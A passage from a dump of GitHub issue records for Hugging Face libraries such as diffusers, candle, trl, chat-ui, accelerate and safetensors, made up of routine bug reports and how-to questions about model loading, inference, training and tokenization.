background_prompts))\r\nrandom.shuffle(combined_list)\r\n\r\nfor item in tqdm(combined_list, total=len(combined_list)):\r\n age, hand, face_angle, hair, background = item\r\n if not os.path.exists(out_dir):\r\n os.makedirs(out_dir)\r\n prompt: str = \", \".join(item)\r\n print(prompt)\r\n out_filename: str = f\"{out_dir}/{prompt.replace(' ', '_')}\"\r\n if not os.path.exists(f\"{out_filename}_0.png\"):\r\n try:\r\n pipe = StableDiffusionXLPipeline.from_pretrained(model_path, safety_checker=None,\r\n requires_safety_checker=False)\r\n pipe.to(device)\r\n prompt_embeds, negative_prompt_embeds = get_pipeline_embeds(pipe, prompt, negative_prompt, device)\r\n images = pipe(prompt_embeds=prompt_embeds, negative_prompt_embeds=negative_prompt_embeds,\r\n num_images_per_prompt=3, width=768,\r\n ", "url": "https://github.com/huggingface/diffusers/issues/4716", "state": "closed", "labels": [ "bug" ], "created_at": "2023-08-22T16:28:25Z", "updated_at": "2023-08-27T02:46:18Z", "user": "elcolie" }, { "repo": "huggingface/candle", "number": 547, "title": "How to turn off automatic translation for whisper", "body": "When I input Chinese wav file , whisper outputs the English translation\r\n```\r\nls@LeeeSes-MacBook-Air ~/r/candle (main)> cargo run --release --features accelerate --example whisper -- --model small --language zh --input /Users/ls/Downloads/output.wav\r\n Finished release [optimized] target(s) in 0.38s\r\n Running `target/release/examples/whisper --model small --language zh --input /Users/ls/Downloads/output.wav`\r\nRunning on CPU, to run on GPU, build this example with `--features cuda`\r\nloaded wav data: Header { audio_format: 1, channel_count: 1, sampling_rate: 16000, bytes_per_second: 32000, bytes_per_sample: 2, bits_per_sample: 16 }\r\npcm data loaded 287216\r\nloaded mel: [1, 80, 4500]\r\n0.0s -- 30.0s: This is a free online audio recorder application program. You can record sound from microphone. After recording, you can edit sound and edit any parts, adjust the balance and sound. Let's use the recording first.\r\n30.0s -- 45.0s: I'm sorry.\r\n```", "url": "https://github.com/huggingface/candle/issues/547", "state": "closed", "labels": [], "created_at": "2023-08-22T11:16:45Z", "updated_at": "2023-08-22T18:52:40Z", "user": "LeeeSe" }, { "repo": "huggingface/trl", "number": 674, "title": "How to load the model and the checkpoint after trained the model?", "body": "I trained my model using the code in the sft_trainer.py. And I save the checkpoint and the model in the same dir.\r\nBut I don't know how to load the model with the checkpoint. Or I just want to konw that `trainer.save_model(script_args.output_dir)` means I have save a trained model, not just a checkpoint? \r\nI try many ways to load the trained model but errors like \r\n```\r\nRuntimeError: Error(s) in loading state_dict for PrefixEncoder:\r\n\tMissing key(s) in state_dict: \"embedding.weight\". \r\n```\r\nSo, how to load the model???", "url": "https://github.com/huggingface/trl/issues/674", "state": "closed", "labels": [], "created_at": "2023-08-22T10:31:01Z", "updated_at": "2023-11-27T21:34:30Z", "user": "ccwdb" }, { "repo": "huggingface/text-generation-inference", "number": 899, "title": "text-generation-launcher tool how to use multi gpu cards?", "body": "### System Info\n\ntext-generation-launcher 1.0.0 how to use multi gpu cards?\r\n\n\n### Information\n\n- [ ] Docker\n- [X] The CLI directly\n\n### Tasks\n\n- [X] An officially supported command\n- [ ] My own modifications\n\n### Reproduction\n\nCUDA_VISIBLE_DEVICES=0,1,2,3 text-generation-launcher --model-id falcon-40b-instruct --sharded true --num-shard 1 --quantize bitsandbytes-fp4 does not used multi gpu A10 card. Error with GPU 0 OutOfMemoryError: CUDA out of memory.\n\n### Expected behavior\n\nNormal load the model and http post.", "url": "https://github.com/huggingface/text-generation-inference/issues/899", "state": "closed", "labels": [], "created_at": "2023-08-22T10:09:17Z", "updated_at": "2023-08-22T10:13:06Z", "user": "luefei" }, { "repo": "huggingface/chat-ui", "number": 411, "title": "Chat-ui crashes TGI?", "body": "Hey!\r\n\r\nWhen I deploy TGI Endpoint locally and test it with the following cli request: \r\n\r\n`curl 127.0.0.1:8080/generate_stream \\\r\n -X POST \\\r\n -d '{\"inputs\":\"def calculate_fibonacci(n:str):\",\"parameters\":{\"max_new_tokens\":100}}' \\\r\n -H 'Content-Type: application/json'`\r\n\r\nIt works without any problem. Even load tests with locust.io work without problems.\r\n\r\nThis is the response from tgi with the curl command: \r\n\r\n`2023-08-22T08:29:52.944813Z INFO HTTP request{otel.name=POST /generate_stream http.client_ip= http.flavor=1.1 http.host=127.0.0.1:8080 http.method=POST http.route=/generate_stream http.scheme=HTTP http.target=/generate_stream http.user_agent=curl/7.82.0 otel.kind=server trace_id=772a4a52f29b540aac2b3b331ea5247a http.status_code=200 otel.status_code=\"OK\"}:generate_stream{parameters=GenerateParameters { best_of: None, temperature: None, repetition_penalty: None, top_k: None, top_p: None, typical_p: None, do_sample: false, max_new_tokens: 100, return_full_text: None, stop: [], truncate: None, watermark: false, details: false, decoder_input_details: false, seed: None } total_time=\"5.639886919s\" validation_time=\"153.888\u00b5s\" queue_time=\"184.627\u00b5s\" inference_time=\"5.639548636s\" time_per_token=\"56.395486ms\" seed=\"None\"}: text_generation_router::server: router/src/server.rs:452: Success`\r\n\r\nBut if I want to call tgi with the chat-ui it works the first time (I get an streaming response in the chat-ui), but then the tgi freezes?\r\nEDIT: This is the output I get from tgi (I get two responses from tgi?):\r\n\r\n`2023-08-22T11:38:32.027037Z INFO HTTP request{otel.name=POST / http.client_ip= http.flavor=1.1 http.host=127.0.0.1:8080 http.method=POST http.route=/ http.scheme=HTTP http.target=/ http.user_agent=undici otel.kind=server trace_id=a55b57fc395cc1f8fa59dcd111733cd4 http.status_code=200 otel.status_code=\"OK\"}:compat_generate{default_return_full_text=false}:generate_stream{parameters=GenerateParameters { best_of: None, temperature: Some(0.9), repetition_penalty: Some(1.2), top_k: Some(50), top_p: Some(0.95), typical_p: None, do_sample: false, max_new_tokens: 1048, return_full_text: Some(false), stop: [], truncate: Some(1000), watermark: false, details: false, decoder_input_details: false, seed: None } total_time=\"1.803072692s\" validation_time=\"139.35\u00b5s\" queue_time=\"209.805\u00b5s\" inference_time=\"1.802724034s\" time_per_token=\"56.335126ms\" seed=\"Some(14814785333613176252)\"}: text_generation_router::server: router/src/server.rs:450: Success\r\n`\r\n\r\n`\r\n2023-08-22T11:38:32.643776Z INFO HTTP request{otel.name=POST / http.client_ip= http.flavor=1.1 http.host=127.0.0.1:8080 http.method=POST http.route=/ http.scheme=HTTP http.target=/ http.user_agent=undici otel.kind=server trace_id=7064d891ae5c88c74aaba2f06cacd5d3}:compat_generate{default_return_full_text=false}:generate{parameters=GenerateParameters { best_of: None, temperature: None, repetition_penalty: None, top_k: None, top_p: None, typical_p: None, do_sample: false, max_new_tokens: 20, return_full_text: Some(false), stop: [], truncate: None, watermark: false, details: false, decoder_input_details: false, seed: None } total_time=\"519.787388ms\" validation_time=\"77.98\u00b5s\" queue_time=\"78.433\u00b5s\" inference_time=\"519.63134ms\" time_per_token=\"57.736815ms\" seed=\"None\"}: text_generation_router::server: router/src/server.rs:287: Success`\r\n\r\nEDIT: I get the following output in my terminal with the second response from tgi: \r\n\r\n`\r\nSyntaxError: Unexpected token d in JSON at position 0\r\n at JSON.parse ()\r\n at Module.generateFromDefaultEndpoint (/Users/xx/Desktop/chat-ui/src/lib/server/generateFromDefaultEndpoint.ts:73:30)\r\n at process.processTicksAndRejections (node:internal/process/task_queues:95:5)\r\n at async POST (/Users/xx/Desktop/chat-ui/src/routes/conversation/[id]/summarize/+server.ts:30:26)\r\n at async Module.render_endpoint (/Users/xx/Desktop/chat-ui/node_modules/@sveltejs/kit/src/runtime/server/endpoint.js:47:20)\r\n at async resolve (/Users/xx/Desktop/chat-ui/node_modules/@sveltejs/kit/src/runtime/server/respond.js:388:17)\r\n at async Object.handle (/Users/xx/Desktop/chat-ui/src/hooks.server.ts:66:20)\r\n at async Module.respond (/Users/xx/Desktop/chat-ui/node_modules/@sveltejs/kit/src/runtime/server/respond.js:259:20)\r\n at async file:///Users/xx/Desktop/chat-ui/node_modules/@sveltejs/kit/src/exports/vite/dev/index.js:506:22`\r\n\r\nchat-ui version: 0.5.0\r\ntgi-version: 1.0.1\r\n\r\nChat-UI Model Config: \r\n```\r\nMODELS=`[\r\n {\r\n \"name\": \"Vicuna\",\r\n \"datasetName\": \"OpenAssistant/oasst1\",\r\n \"endpoints\": [{\"url\": \"http://127.0.0.1:8080/generate_stream\"}],\r\n \"description\": \"A good alternative to ChatGPT\",\r\n \"websiteUrl\": \"https://open-assistant.io\",\r\n \"userMessageToken\": \"USER:\",\r\n \"assistantMessageToken\": \"ASSISTANT:\",\r\n \"messageEndToken\": \"\",\r\n \"preprompt\": \"A chat between a curious user and an artificial intelligence assistant. The assistant gives helpful, detailed, and polite answers to the user's questions.\\n\\n", "url": "https://github.com/huggingface/chat-ui/issues/411", "state": "open", "labels": [], "created_at": "2023-08-22T08:48:02Z", "updated_at": "2023-08-23T06:45:26Z", "comments": 0, "user": "schauppi" }, { "repo": "huggingface/accelerate", "number": 1870, "title": "[Question] How to optimize two loss alternately with gradient accumulation?", "body": "I want to update a model by optimizing two loss alternately with gradient accumulation like this\r\n\r\n```python\r\n# Suppose gradient_accumulation is set to 2.\r\noptimizer = optim(unet.parameters())\r\nwith accelerator.accumulate(unet):\r\n outputs = unet(input)\r\n loss1 = loss_func1(outputs)\r\n loss1.backward()\r\n optimizer.step()\r\n optimizer.zero_grad()\r\n\r\nwith accelerator.accumulate(unet):\r\n outputs = unet(input)\r\n loss2 = loss_func2(outputs)\r\n loss2.backward()\r\n optimizer.step()\r\n optimizer.zero_grad()\r\n```\r\n\r\nIs this correct? It appears from the [documentation](https://huggingface.co/docs/accelerate/usage_guides/gradient_accumulation#converting-it-to-accelerate) that `accelerator.accumulate` will normalize the loss and then backpropagate without updating the gradient until reaching `gradient_accumulation_steps`. My main concern is that the gradients accumulated by two different losses for the same model will affect each other.\r\n\r\nHope to find some help here, thanks in advance.", "url": "https://github.com/huggingface/accelerate/issues/1870", "state": "closed", "labels": [], "created_at": "2023-08-21T12:49:19Z", "updated_at": "2023-10-24T15:06:33Z", "user": "hkunzhe" }, { "repo": "huggingface/candle", "number": 538, "title": "How to disable openssl-sys being included?", "body": "I would like to stop openssl-sys from being included in my project when using candle, I'm not sure how to do this. I tried adding the below to my Cargo.toml but it didn't change anything. The reason I want to do it is because I get an error when trying to compile my library to aarch64-linux-android saying that pkg-config has not been configured to support cross-compilation and that I should install a sysroot for the target platform, but I'd like to not include it anyways since I won't be needing it and will be loading everything locally. Thanks.\r\n\r\n```\r\nhf-hub = { version = \"0.2.0\", default-features = false }\r\ntokenizers = { version = \"0.13.4\", default-features = false }\r\n```", "url": "https://github.com/huggingface/candle/issues/538", "state": "closed", "labels": [], "created_at": "2023-08-21T10:47:26Z", "updated_at": "2023-08-21T20:38:57Z", "user": "soupslurpr" }, { "repo": "huggingface/optimum", "number": 1298, "title": "Support BetterTransfomer for the Baichuan LLM model", "body": "### Feature request\n\nis it possible to support Baichuan model with BetterTransformer?\r\n\r\nhttps://huggingface.co/baichuan-inc/Baichuan-13B-Chat\n\n### Motivation\n\nA very popular Chinese and English large language model.\n\n### Your contribution\n\nhope you can achieve it. Thanks.", "url": "https://github.com/huggingface/optimum/issues/1298", "state": "closed", "labels": [ "feature-request", "bettertransformer", "Stale" ], "created_at": "2023-08-21T08:18:16Z", "updated_at": "2025-05-04T02:17:22Z", "comments": 1, "user": "BobLiu20" }, { "repo": "huggingface/candle", "number": 533, "title": "How to convert token to text?", "body": "Hello, thank you for this ML library in Rust. Sorry if this is a noob question, I'm new to machine learning and this is my first time trying to use a text generation model. I'm using the latest git version. In the quantized llama example, how would I convert a token to a string? I see the print_token function but I want to convert it to a string and maybe push to a vector so I can return all the generated text when it is finished processing. ", "url": "https://github.com/huggingface/candle/issues/533", "state": "closed", "labels": [], "created_at": "2023-08-21T06:36:08Z", "updated_at": "2023-08-21T07:51:37Z", "user": "soupslurpr" }, { "repo": "huggingface/safetensors", "number": 333, "title": "Slow load weight values from a HF model on a big-endian machine with the latest code", "body": "### System Info\r\n\r\nPython: 3.10\r\nPyTorch: the latest main branch (i.e. 2.0.1+)\r\nsafetensors: 0.3.3\r\nPlatform: s390x (big-endian)\r\n\r\n### Information\r\n\r\n- [ ] The official example scripts\r\n- [X] My own modified scripts\r\n\r\n### Reproduction\r\n\r\nI executed the following code using 0.3.1 and 0.3.3, and w/o safetensors.\r\n\r\n```\r\nimport time\r\nimport torch\r\nfrom transformers import T5ForConditionalGeneration, AutoTokenizer\r\ntry:\r\n import safetensors \r\n print(\"safetensors version:\", safetensors.__version__)\r\nexcept:\r\n print(\"safetensors not installed\")\r\ntorch.serialization.set_default_load_endianness(torch.serialization.LoadEndianness.LITTLE)\r\n\r\nmodel = \"google/flan-t5-xxl\"\r\ntokenizer = AutoTokenizer.from_pretrained(model)\r\ninput_text = \"The square root of x is the cube root of y. What is y to the power of 2, if x = 4?\"\r\ninput = tokenizer(input_text, return_tensors=\"pt\").input_ids\r\n\r\nt0 = time.perf_counter()\r\n#model = T5ForConditionalGeneration.from_pretrained(model, low_cpu_mem_usage=True, use_safetensors=False)\r\nmodel = T5ForConditionalGeneration.from_pretrained(model, low_cpu_mem_usage=True, use_safetensors=True)\r\nt1 = time.perf_counter()\r\nprint(\"load elapsed time:\", t1-t0)\r\noutput = model.decoder.forward(input_ids=input) ## intentionally use decoder.forward() instead of generate()\r\nt2 = time.perf_counter()\r\nprint(\"forward elapsed time:\", t2-t1)\r\n```\r\n\r\nFindings\r\n- Old version (0.3.1) w/o swapping data is quite faster than 0.3.3 w/ swapping data, which we understand.\r\n- 0.3.3 is a bit slow than `torch.load`, which implies we could have some room to improve.\r\n\r\nThe result is the best time of five tries after I downloaded model files into local file system.\r\n\r\n```\r\n$ python flan-t5.py \r\nsafetensors not installed\r\nLoading checkpoint shards: 100%|\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588| 5/5 [00:21<00:00, 4.37s/it]\r\nload elapsed time: 22.09646322298795\r\nforward elapsed time: 1.4204098680056632\r\n```\r\n\r\n```\r\n$ python flan-t5.py \r\nsafetensors version: 0.3.3\r\nLoading checkpoint shards: 100%|\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588| 5/5 [00:25<00:00, 5.05s/it]\r\nload elapsed time: 25.486608179984614\r\nforward elapsed time: 1.4887599580106325\r\n```\r\n\r\n```\r\n$ python flan-t5.py \r\nsafetensors version: 0.3.1\r\nLoading checkpoint shards: 100%|\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588| 5/5 [00:00<00:00, 35.73it/s]\r\nload elapsed time: 0.37154227000428364\r\nforward elapsed time: 1.1782474629580975\r\n```\r\n\r\n\r\n### Expected behavior\r\n\r\nWe expect that we can alleviate the overhead of swapping data. The overhead of 4x looks too large.", "url": "https://github.com/huggingface/safetensors/issues/333", "state": "closed", "labels": [ "Stale" ], "created_at": "2023-08-20T18:19:44Z", "updated_at": "2023-12-12T01:48:51Z", "comments": 9, "user": "kiszk" }, { "repo": "huggingface/chat-ui", "number": 409, "title": "Deploy Chat UI Spaces Docker template with a PEFT adapter ", "body": "I tried to accomplish this, but the container failed to launch the chat-ui app, as it seems to assume the model would be a non-adapted model.\r\n\r\nIs there a way to make it work?", "url": "https://github.com/huggingface/chat-ui/issues/409", "state": "closed", "labels": [ "bug", "back" ], "created_at": "2023-08-20T05:26:50Z", "updated_at": "2023-09-11T09:37:29Z", "comments": 4, "user": "lrtherond" }, { "repo": "huggingface/datasets", "number": 6163, "title": "Error type: ArrowInvalid Details: Failed to parse string: '[254,254]' as a scalar of type int32", "body": "### Describe the bug\n\nI am getting the following error while I am trying to upload the CSV sheet to train a model. My CSV sheet content is exactly same as shown in the example CSV file in the Auto Train page. Attaching screenshot of error for reference. I have also tried converting the index of the answer that are integer into string by placing inverted commas and also without inverted commas. \r\nCan anyone please help me out? \r\nFYI : I am using Chrome browser.\r\n\r\nError type: ArrowInvalid\r\nDetails: Failed to parse string: '[254,254]' as a scalar of type int32\r\n\r\n![Screenshot 2023-08-19 165827](https://github.com/huggingface/datasets/assets/90616801/95fad96e-7dce-4bb5-9f83-9f1659a32891)\r\n\n\n### Steps to reproduce the bug\n\nKindly let me know how to fix this?\n\n### Expected behavior\n\nKindly let me know how to fix this?\n\n### Environment info\n\nKindly let me know how to fix this?", "url": "https://github.com/huggingface/datasets/issues/6163", "state": "open", "labels": [], "created_at": "2023-08-19T11:34:40Z", "updated_at": "2025-07-22T12:04:46Z", "comments": 2, "user": "shishirCTC" }, { "repo": "huggingface/sentence-transformers", "number": 2278, "title": "How to set the no. of epochs for fine-tuning SBERT?", "body": "Hello,\r\nI am fine-tuning an biencoder SBERT model on domain specific data for semantic similarity. There is no loss value posted by the `fit ` function from the package. Any idea how to know if the model is overfitting or underfiting the dataset after each epoch? This could help me in deciding the appropriate no. of epochs required for fine-tuning.\r\n\r\nThank you.", "url": "https://github.com/huggingface/sentence-transformers/issues/2278", "state": "open", "labels": [], "created_at": "2023-08-18T18:14:05Z", "updated_at": "2024-01-29T17:00:13Z", "user": "power-puff-gg" }, { "repo": "huggingface/setfit", "number": 409, "title": "model_head.pkl not found on HuggingFace Hub", "body": "i got message:\r\n\"model_head.pkl not found on HuggingFace Hub, initialising classification head with random weights. You should TRAIN this model on a downstream task to use it for predictions and inference.\"\r\n\r\nis there something missing or is it normal?", "url": "https://github.com/huggingface/setfit/issues/409", "state": "closed", "labels": [ "question" ], "created_at": "2023-08-18T07:52:20Z", "updated_at": "2023-11-24T14:20:51Z", "user": "andysingal" }, { "repo": "huggingface/autotrain-advanced", "number": 216, "title": "How to do inference after train llama2", "body": "i trained model using this command\r\n```\r\nautotrain llm --train --project_name 'llama2-indo-testing' \\\r\n --model meta-llama/Llama-2-7b-hf \\\r\n --data_path data/ \\\r\n --text_column text \\\r\n --use_peft \\\r\n --use_int4 \\\r\n --learning_rate 2e-4 \\\r\n --train_batch_size 2 \\\r\n --num_train_epochs 3 \\\r\n --trainer sft \\\r\n --model_max_length 2048 \\\r\n --push_to_hub \\\r\n --repo_id fhadli/llama2-7b-hf-id \\\r\n --block_size 2048 \\\r\n > training.log\r\n```\r\nafter that, i tried to load the model using this script\r\n```\r\nfrom transformers import AutoTokenizer\r\nimport transformers\r\nimport torch\r\n\r\nmodel = \"/home/muhammad.fhadli/explorasi/llama2-indo/llama2-indo-testing\"\r\n\r\ntokenizer = AutoTokenizer.from_pretrained(model)\r\npipeline = transformers.pipeline(\r\n \"text-generation\",\r\n model=model,\r\n torch_dtype=torch.float16,\r\n device_map=\"auto\",\r\n)\r\n```\r\n\r\nbut it gave me this error, can someone please explain why i got this error, or what is the rigth way to do inference?\r\n```\r\nTraceback (most recent call last):\r\n File \"play.py\", line 8, in \r\n pipeline = transformers.pipeline(\r\n File \"/home/muhammad.fhadli/.pyenv/versions/3.8.10/envs/llama/lib/python3.8/site-packages/transformers/pipelines/__init__.py\", line 705, in pipeline\r\n config = AutoConfig.from_pretrained(model, _from_pipeline=task, **hub_kwargs, **model_kwargs)\r\n File \"/home/muhammad.fhadli/.pyenv/versions/3.8.10/envs/llama/lib/python3.8/site-packages/transformers/models/auto/configuration_auto.py\", line 983, in from_pretrained\r\n config_dict, unused_kwargs = PretrainedConfig.get_config_dict(pretrained_model_name_or_path, **kwargs)\r\n File \"/home/muhammad.fhadli/.pyenv/versions/3.8.10/envs/llama/lib/python3.8/site-packages/transformers/configuration_utils.py\", line 617, in get_config_dict\r\n config_dict, kwargs = cls._get_config_dict(pretrained_model_name_or_path, **kwargs)\r\n File \"/home/muhammad.fhadli/.pyenv/versions/3.8.10/envs/llama/lib/python3.8/site-packages/transformers/configuration_utils.py\", line 672, in _get_config_dict\r\n resolved_config_file = cached_file(\r\n File \"/home/muhammad.fhadli/.pyenv/versions/3.8.10/envs/llama/lib/python3.8/site-packages/transformers/utils/hub.py\", line 388, in cached_file\r\n raise EnvironmentError(\r\nOSError: /home/muhammad.fhadli/explorasi/llama2-indo/llama2-indo-testing/ does not appear to have a file named config.json. Checkout 'https://huggingface.co//home/muhammad.fhadli/explorasi/llama2-indo/llama2-indo-testing//None' for available files.\r\n```\r\nhere is the content inside my folder\r\n```\r\n$ls /home/muhammad.fhadli/explorasi/llama2-indo/llama2-indo-testing/\r\nadapter_config.json optimizer.pt rng_state_0.pth scheduler.pt tokenizer_config.json tokenizer.model training_args.bin\r\nadapter_model.bin README.md rng_state_1.pth special_tokens_map.json tokenizer.json trainer_state.json\r\n```", "url": "https://github.com/huggingface/autotrain-advanced/issues/216", "state": "closed", "labels": [], "created_at": "2023-08-18T04:36:37Z", "updated_at": "2023-12-18T15:30:38Z", "user": "muhammadfhadli1453" }, { "repo": "huggingface/diffusers", "number": 4662, "title": "How to call a different scheduler when training a model from repo", "body": "I notice that the settings in train_dreambooth_lora_sdxl.py and the scheduler config from the repo seem to conflict. In the .py the noise scheduler is DDPM but whenever training starts it seems to still indicate that I am using the repo config scheduler, ie. EulerDiscreteScheduler. It used to be you could specify scheduler config by path but that seemed to have deprecated at some point.", "url": "https://github.com/huggingface/diffusers/issues/4662", "state": "closed", "labels": [], "created_at": "2023-08-17T21:40:10Z", "updated_at": "2023-08-18T04:18:11Z", "user": "jmaccall316" }, { "repo": "huggingface/transformers", "number": 25576, "title": "How can i make a PR for autotokenzier to adapt RWKV world", "body": "### Feature request\r\n\r\nUsusally we use own tokenzier with the transformer pipeline, \r\nlike this https://github.com/xiaol/Huggingface-RWKV-World/blob/fca236afd5f2815b0dbe6c7ce3c92e51526e2e14/generate_hf_cfg.py#L79C1-L79C1\r\n\r\nSo far we have a lot of models using new tokenzier, using pipeline with autotokenizer is critically needed.\r\n\r\nHow can i add new tokenizer to autotokenzier to make this pipeline smooth and peace. \r\n\r\nThank you.\r\n\r\n\r\n### Motivation\r\n\r\n1. make everyone use RWKV world smoothly, and RWKV v5 world is coming.\r\n2. can support huggingface communtiy with this awesome models , make opensource more open.\r\n3. i really don't like llama models always on the top of open llm leardboards.\r\n4. more...\r\n\r\n### Your contribution\r\n\r\nI made a lots of models based on RWKV 4 world ,https://huggingface.co/xiaol , especially 128k context models.", "url": "https://github.com/huggingface/transformers/issues/25576", "state": "closed", "labels": [], "created_at": "2023-08-17T16:36:44Z", "updated_at": "2023-09-25T08:02:43Z", "user": "xiaol" }, { "repo": "huggingface/accelerate", "number": 1854, "title": "How to further accelerate training with 24 cards for 1.3b+ models using accelerate\uff1f", "body": "I found that when using DeepSpeed Zero (2 or 3) to train 1.3 billion and larger models (such as llama-7b or gpt-neo-1.3b), the training time for 8 * 32G V100 is almost the same as 24 * 32G V100 (I guess it's because of the additional communication overhead introduced by DeepSpeed). Is there any way to further accelerate training by utilizing 24 cards? Currently, Megatron-LM integration is limited to gpt-2 and gpt-j and also, I'm not sure whether this will help.\r\n\r\n", "url": "https://github.com/huggingface/accelerate/issues/1854", "state": "closed", "labels": [], "created_at": "2023-08-17T15:01:09Z", "updated_at": "2023-09-24T15:05:52Z", "user": "Micheallei" }, { "repo": "huggingface/datasets", "number": 6156, "title": "Why not use self._epoch as seed to shuffle in distributed training with IterableDataset", "body": "### Describe the bug\r\n\r\nCurrently, distributed training with `IterableDataset` needs to pass fixed seed to shuffle to keep each node use the same seed to avoid overlapping.\r\nhttps://github.com/huggingface/datasets/blob/a7f8d9019e7cb104eac4106bdc6ec0292f0dc61a/src/datasets/iterable_dataset.py#L1174-L1177\r\n\r\nMy question is why not directly use `self._epoch` which is set by `set_epoch` as seed? It's almost the same across nodes.\r\nhttps://github.com/huggingface/datasets/blob/a7f8d9019e7cb104eac4106bdc6ec0292f0dc61a/src/datasets/iterable_dataset.py#L1790-L1801\r\n\r\nIf not using `self._epoch` as shuffling seed, what does this method do to prepare an epoch seeded generator?\r\nhttps://github.com/huggingface/datasets/blob/a7f8d9019e7cb104eac4106bdc6ec0292f0dc61a/src/datasets/iterable_dataset.py#L1206\r\n\r\n\r\n\r\n### Steps to reproduce the bug\r\n\r\nAs mentioned above.\r\n\r\n### Expected behavior\r\n\r\nAs mentioned above.\r\n\r\n### Environment info\r\n\r\nNot related", "url": "https://github.com/huggingface/datasets/issues/6156", "state": "closed", "labels": [], "created_at": "2023-08-17T10:58:20Z", "updated_at": "2023-08-17T14:33:15Z", "comments": 3, "user": "npuichigo" }, { "repo": "huggingface/diffusers", "number": 4643, "title": "when i load a controlnet model,where is the inference code?", "body": " I have read the code of con in diffusers/models/controlnet.py.\r\nbut when I load a con weight,where is the code?\r\ntks", "url": "https://github.com/huggingface/diffusers/issues/4643", "state": "closed", "labels": [], "created_at": "2023-08-17T02:50:59Z", "updated_at": "2023-08-17T04:55:28Z", "user": "henbucuoshanghai" }, { "repo": "huggingface/dataset-viewer", "number": 1689, "title": "Handle breaking change in google dependency?", "body": "See https://huggingface.co/datasets/bigscience/P3/discussions/6#64dca122e3e44e8000c45616\r\n\r\nShould we downgrade the dependency, or fix the datasets?", 